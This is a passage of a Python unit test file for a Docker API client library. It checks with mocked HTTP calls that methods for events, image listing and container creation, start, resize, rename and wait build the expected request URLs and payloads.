until = now + datetime.timedelta(seconds=10)
try:
self.client.events(since=since, until=until)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'events',
params={
'since': ts - 10,
'until': ts + 10,
'filters': None
},
stream=True
)
def test_events_with_filters(self):
filters = {'event': ['die', 'stop'],
'container': fake_api.FAKE_CONTAINER_ID}
try:
self.client.events(filters=filters)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
expected_filters = docker.utils.convert_filters(filters)
fake_request.assert_called_with(
url_prefix + 'events',
params={
'since': None,
'until': None,
'filters': expected_filters
},
stream=True
)
###################
# LISTING TESTS #
###################
def test_images(self):
try:
self.client.images(all=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 0, 'all': 1},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_images_quiet(self):
try:
self.client.images(all=True, quiet=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 1, 'all': 1},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_ids(self):
try:
self.client.images(quiet=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 1, 'all': 0},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_images_filters(self):
try:
self.client.images(filters={'dangling': True})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 0, 'all': 0,
'filters': '{"dangling": ["true"]}'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_list_containers(self):
try:
self.client.containers(all=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/json',
params={
'all': 1,
'since': None,
'size': 0,
'limit': -1,
'trunc_cmd': 0,
'before': None
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
#####################
# CONTAINER TESTS #
#####################
def test_create_container(self):
try:
self.client.create_container('busybox', 'true')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": false, "Memory": 0,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": false,
"OpenStdin": false, "NetworkDisabled": false,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_binds(self):
mount_dest = '/mnt'
try:
self.client.create_container('busybox', ['ls', mount_dest],
volumes=[mount_dest])
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls", "/mnt"], "AttachStdin": false,
"Volumes": {"/mnt": {}}, "Memory": 0,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_volume_string(self):
mount_dest = '/mnt'
try:
self.client.create_container('busybox', ['ls', mount_dest],
volumes=mount_dest)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls", "/mnt"], "AttachStdin": false,
"Volumes": {"/mnt": {}}, "Memory": 0,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_ports(self):
try:
self.client.create_container('busybox', 'ls',
ports=[1111, (2222, 'udp'), (3333,)])
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"Memory": 0, "ExposedPorts": {
"1111/tcp": {},
"2222/udp": {},
"3333/tcp": {}
},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_entrypoint(self):
try:
self.client.create_container('busybox', 'hello',
entrypoint='cowsay')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["hello"], "AttachStdin": false,
"Memory": 0,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"Entrypoint": "cowsay",
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cpu_shares(self):
try:
self.client.create_container('busybox', 'ls',
cpu_shares=5)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"Memory": 0,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"CpuShares": 5,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cpuset(self):
try:
self.client.create_container('busybox', 'ls',
cpuset='0,1')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"Memory": 0,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"Cpuset": "0,1",
"CpusetCpus": "0,1",
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_working_dir(self):
try:
self.client.create_container('busybox', 'ls',
working_dir='/root')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"Memory": 0,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"WorkingDir": "/root",
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_stdin_open(self):
try:
self.client.create_container('busybox', 'true', stdin_open=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": true, "Memory": 0,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": true,
"OpenStdin": true, "NetworkDisabled": false,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_volumes_from(self):
vol_names = ['foo', 'bar']
try:
self.client.create_container('busybox', 'true',
volumes_from=vol_names)
except docker.errors.DockerException as e:
self.assertTrue(
docker.utils.compare_version('1.10', self.client._version) >= 0
)
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['VolumesFrom'],
','.join(vol_names))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_empty_volumes_from(self):
try:
self.client.create_container('busybox', 'true', volumes_from=[])
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertTrue('VolumesFrom' not in data)
def test_create_named_container(self):
try:
self.client.create_container('busybox', 'true',
name='marisa-kirisame')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": false, "Memory": 0,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": false,
"OpenStdin": false, "NetworkDisabled": false,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(args[1]['params'], {'name': 'marisa-kirisame'})
def test_create_container_with_mem_limit_as_int(self):
try:
self.client.create_container('busybox', 'true',
mem_limit=128.0)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['Memory'], 128.0)
def test_create_container_with_mem_limit_as_string(self):
try:
self.client.create_container('busybox', 'true',
mem_limit='128')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['Memory'], 128.0)
def test_create_container_with_mem_limit_as_string_with_k_unit(self):
try:
self.client.create_container('busybox', 'true',
mem_limit='128k')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['Memory'], 128.0 * 1024)
def test_create_container_with_mem_limit_as_string_with_m_unit(self):
try:
self.client.create_container('busybox', 'true',
mem_limit='128m')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['Memory'], 128.0 * 1024 * 1024)
def test_create_container_with_mem_limit_as_string_with_g_unit(self):
try:
self.client.create_container('busybox', 'true',
mem_limit='128g')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['Memory'], 128.0 * 1024 * 1024 * 1024)
def test_create_container_with_mem_limit_as_string_with_wrong_value(self):
self.assertRaises(docker.errors.DockerException,
self.client.create_container,
'busybox', 'true', mem_limit='128p')
self.assertRaises(docker.errors.DockerException,
self.client.create_container,
'busybox', 'true', mem_limit='1f28')
def test_start_container(self):
try:
self.client.start(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
            self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0],
url_prefix + 'containers/3cc2351ab11b/start'
)
self.assertEqual(json.loads(args[1]['data']), {})
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_start_container_none(self):
try:
self.client.start(container=None)
except ValueError as e:
self.assertEqual(str(e), 'image or container param is undefined')
else:
self.fail('Command should raise ValueError')
try:
self.client.start(None)
except ValueError as e:
self.assertEqual(str(e), 'image or container param is undefined')
else:
self.fail('Command should raise ValueError')
def test_start_container_regression_573(self):
try:
self.client.start(**{'container': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_create_container_with_lxc_conf(self):
try:
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0],
url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['LxcConf'] = [
{"Value": "lxc.conf.value", "Key": "lxc.conf.k"}
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'],
{'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_lxc_conf_compat(self):
try:
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['LxcConf'] = [
{"Value": "lxc.conf.value", "Key": "lxc.conf.k"}
]
self.assertEqual(
json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_ro(self):
try:
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"ro": True
}}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:ro"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_rw(self):
try:
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"ro": False
}}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:rw"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_port_binds(self):
self.maxDiff = None
try:
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
data = json.loads(args[1]['data'])
port_bindings = data['HostConfig']['PortBindings']
self.assertTrue('1111/tcp' in port_bindings)
self.assertTrue('2222/tcp' in port_bindings)
self.assertTrue('3333/udp' in port_bindings)
self.assertTrue('4444/tcp' in port_bindings)
self.assertTrue('5555/tcp' in port_bindings)
self.assertTrue('6666/tcp' in port_bindings)
self.assertEqual(
[{"HostPort": "", "HostIp": ""}],
port_bindings['1111/tcp']
)
self.assertEqual(
[{"HostPort": "2222", "HostIp": ""}],
port_bindings['2222/tcp']
)
self.assertEqual(
[{"HostPort": "3333", "HostIp": ""}],
port_bindings['3333/udp']
)
self.assertEqual(
[{"HostPort": "", "HostIp": "127.0.0.1"}],
port_bindings['4444/tcp']
)
self.assertEqual(
[{"HostPort": "5555", "HostIp": "127.0.0.1"}],
port_bindings['5555/tcp']
)
self.assertEqual(len(port_bindings['6666/tcp']), 2)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_mac_address(self):
try:
mac_address_expected = "02:42:ac:11:00:0a"
container = self.client.create_container(
'busybox', ['sleep', '60'], mac_address=mac_address_expected)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
res = self.client.inspect_container(container['Id'])
self.assertEqual(mac_address_expected,
res['NetworkSettings']['MacAddress'])
def test_create_container_with_links(self):
try:
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
links={link_path: alias}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0], url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Links'] = ['path:alias']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_with_multiple_links(self):
try:
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
links={
link_path + '1': alias + '1',
link_path + '2': alias + '2'
}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Links'] = [
'path1:alias1', 'path2:alias2'
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_with_links_as_list_of_tuples(self):
try:
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
links=[(link_path, alias)]
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Links'] = ['path:alias']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_privileged(self):
try:
self.client.create_container(
'busybox', 'true',
host_config=create_host_config(privileged=True)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Privileged'] = True
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_start_container_with_lxc_conf(self):
if six.PY2:
try:
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
def test_start_container_with_lxc_conf_compat(self):
if six.PY2:
try:
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
def test_start_container_with_binds_ro(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
if six.PY2:
try:
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
mount_origin: {
"bind": mount_dest,
"ro": True
}
}
)
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
mount_origin: {
"bind": mount_dest,
"ro": True
}
}
)
def test_start_container_with_binds_rw(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
if six.PY2:
try:
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
mount_origin: {"bind": mount_dest, "ro": False}
}
)
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
mount_origin: {"bind": mount_dest, "ro": False}
}
)
def test_start_container_with_port_binds(self):
self.maxDiff = None
if six.PY2:
try:
self.client.start(fake_api.FAKE_CONTAINER_ID, port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
})
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(fake_api.FAKE_CONTAINER_ID, port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
})
def test_start_container_with_links(self):
# one link
link_path = 'path'
alias = 'alias'
if six.PY2:
try:
self.client.start(fake_api.FAKE_CONTAINER_ID,
links={link_path: alias})
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(
fake_api.FAKE_CONTAINER_ID, links={link_path: alias}
)
def test_start_container_with_multiple_links(self):
link_path = 'path'
alias = 'alias'
if six.PY2:
try:
self.client.start(
fake_api.FAKE_CONTAINER_ID,
links={
link_path + '1': alias + '1',
link_path + '2': alias + '2'
}
)
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(
fake_api.FAKE_CONTAINER_ID,
links={
link_path + '1': alias + '1',
link_path + '2': alias + '2'
}
)
def test_start_container_with_links_as_list_of_tuples(self):
# one link
link_path = 'path'
alias = 'alias'
if six.PY2:
try:
self.client.start(fake_api.FAKE_CONTAINER_ID,
links=[(link_path, alias)])
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(fake_api.FAKE_CONTAINER_ID,
links=[(link_path, alias)])
def test_start_container_privileged(self):
if six.PY2:
try:
self.client.start(fake_api.FAKE_CONTAINER_ID, privileged=True)
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(fake_api.FAKE_CONTAINER_ID, privileged=True)
def test_start_container_with_dict_instead_of_id(self):
try:
self.client.start({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0],
url_prefix + 'containers/3cc2351ab11b/start'
)
self.assertEqual(json.loads(args[1]['data']), {})
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_restart_policy(self):
try:
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
restart_policy={
"Name": "always",
"MaximumRetryCount": 0
}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['RestartPolicy'] = {
"MaximumRetryCount": 0, "Name": "always"
}
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_added_capabilities(self):
try:
self.client.create_container(
'busybox', 'true',
host_config=create_host_config(cap_add=['MKNOD'])
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['CapAdd'] = ['MKNOD']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_dropped_capabilities(self):
try:
self.client.create_container(
'busybox', 'true',
host_config=create_host_config(cap_drop=['MKNOD'])
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['CapDrop'] = ['MKNOD']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_devices(self):
try:
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
devices=['/dev/sda:/dev/xvda:rwm',
'/dev/sdb:/dev/xvdb',
'/dev/sdc']
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Devices'] = [
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/xvda',
'PathOnHost': '/dev/sda'},
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/xvdb',
'PathOnHost': '/dev/sdb'},
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/sdc',
'PathOnHost': '/dev/sdc'}
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_labels_dict(self):
labels_dict = {
six.text_type('foo'): six.text_type('1'),
six.text_type('bar'): six.text_type('2'),
}
try:
self.client.create_container(
'busybox', 'true',
labels=labels_dict,
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['Labels'], labels_dict)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_labels_list(self):
labels_list = [
six.text_type('foo'),
six.text_type('bar'),
]
labels_dict = {
six.text_type('foo'): six.text_type(),
six.text_type('bar'): six.text_type(),
}
try:
self.client.create_container(
'busybox', 'true',
labels=labels_list,
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['Labels'], labels_dict)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_resize_container(self):
try:
self.client.resize(
{'Id': fake_api.FAKE_CONTAINER_ID},
height=15,
width=120
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/resize',
params={'h': 15, 'w': 120},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_rename_container(self):
try:
self.client.rename(
{'Id': fake_api.FAKE_CONTAINER_ID},
name='foobar'
)
except Exception as e:
            self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/rename',
params={'name': 'foobar'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_wait(self):
try:
self.client.wait(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/wait',
timeout=None
)
def test_wait_with_dict_instead_of_id(self):
try:
self.client.wait({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
            self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/wait',
timeout=None
)
def _socket_path_for_client_session(self, client):
socket_adapter = client.get_adapter('http+docker://')
return socket_adapter.socket_path
def test_url_compatibility_unix(self):
c = docker.Client(base_url="unix://socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_unix_triple_slash(self):
c = docker.Client(base_url="unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
